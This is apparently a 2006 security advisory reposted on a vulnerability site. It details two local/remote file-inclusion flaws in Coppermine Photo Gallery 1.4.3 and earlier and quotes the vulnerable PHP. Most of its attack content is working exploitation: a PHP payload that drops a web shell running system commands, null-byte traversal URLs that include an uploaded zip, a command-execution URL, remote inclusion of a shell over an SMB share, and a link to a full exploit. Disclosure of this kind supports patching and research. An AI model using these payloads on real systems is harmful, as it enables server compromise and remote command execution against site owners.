SecurityvulnsSECURITYVULNS:DOC:11510Coppermine Photo Gallery <=1.4.3 remote code execution
-
Coppermine Photo Gallery <= 1.4.3 arbitrary local/remote inclusion: ---------
-
18/02/2006 5.09.55 -----------------------------------------------------------
software:
site: http://coppermine-gallery.net/index.php
description: "Coppermine is a multi-purpose fully-featured and integrated
web picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend."
i)
vulnerable code in include/init.inc.php near lines 308-343, processing
"lang" argument
…
// Process language selection if present in URI or in user profile or try
// autodetection if default charset is utf-8
if (!empty($_GET['lang']))
{
$USER['lang'] = $_GET['lang']; [!!!]
}
if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
{
$CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
$CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
}
elseif ($CONFIG['charset'] == 'utf-8')
{
include('include/select_lang.inc.php');
if (file_exists('lang/' . $USER['lang'] . '.php'))
{
$CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
$CONFIG['lang'] = $USER['lang']; // [!!!]
}
}
else
{
unset($USER['lang']);
}
if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
{
unset($CONFIG['default_lang']);
}
if (!file_exists("lang/{$CONFIG['lang']}.php")) [!!!]
$CONFIG['lang'] = 'english';
// We load the chosen language file
require "lang/{$CONFIG['lang']}.php"; [!!!]
…
without to be logged in, arbitrary local inclusion, poc:
look at [!!!], code is like this:
…
$USER['lang'] = $_GET['lang'];
…
$CONFIG['lang'] = $USER['lang'];
…
if (!file_exists("lang/{$CONFIG['lang']}.php"))
$CONFIG['lang'] = 'english';
…
require "lang/{$CONFIG['lang']}.php";
you have only to supply an existing file using …/ and a null char…
(also regardless of magic_quotes_gpc settings, because of Coppermine disable
code)
you will have no output because is disabled, but you can proceed so:
upload a malicious zip file , inside we have php code like this:
<?php
$suntzu=fopen("shell.php","w");
fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
fclose($suntzu);
chmod("shell.php",777);
?>
now:
http://[target]/[path]/thumbnails.php?lang=…/albums/userpics/10002/shell.zip%00
(.zip file contempt is not checked like images and in userpics/ folder we have
a folder numbered like 10000 + userid, you can easily and quicly bruteforce url
to find the malicious file)
if you succeed you can launch commands on target system:
http://[target]/[path]/shell.php?CMD=ls%20-la
ii)
vulnerable code in docs/showdoc.php at line 21:
…
if (isset($_REQUEST['f'])) { $file = $_REQUEST['f']; } else { $file = ''; }
…
…
// harden against expolits: check the requested vars, replace illegal chars
$file = stripslashes($file); [!]
$forbidden_chars = array("…", "/", "%", "<", ">", "$", "'", '"'); [!!]
$file = str_replace($forbidden_chars, '', $file); [!!!]
ob_start();
@include($file); [!!!]
…
poc: http://[target]/[path]/docs/showdoc.php?f=c:\boot.ini
http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php
(the last one from a samba resource…)
if magic_quotes_gpc=on, "c:\\boot.ini" after stripslashes becomes "c:\boot.ini"
(cause striplashes do not remove all "\"s )
and "\\\\192.168.1.2\\c\\shell.php" becomes "\\192.168.1.2\c\shell.php"
poc 2: http://[target]/[path]/docs/showdoc.php?f=c:\\boot.ini
http://[target]/[path]/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php
if magic_quotes_gpc=off:
"f" becomes "c:\boot.ini" or "\\192.168.1.2\c\shell.php"
so you can include local and external (Samba) resources regardless of
magic_quotes_gpc settings
full proof of concept exploit for i) at this url:
http://retrogod.altervista.org/cpg_143_incl_xpl.html
rgod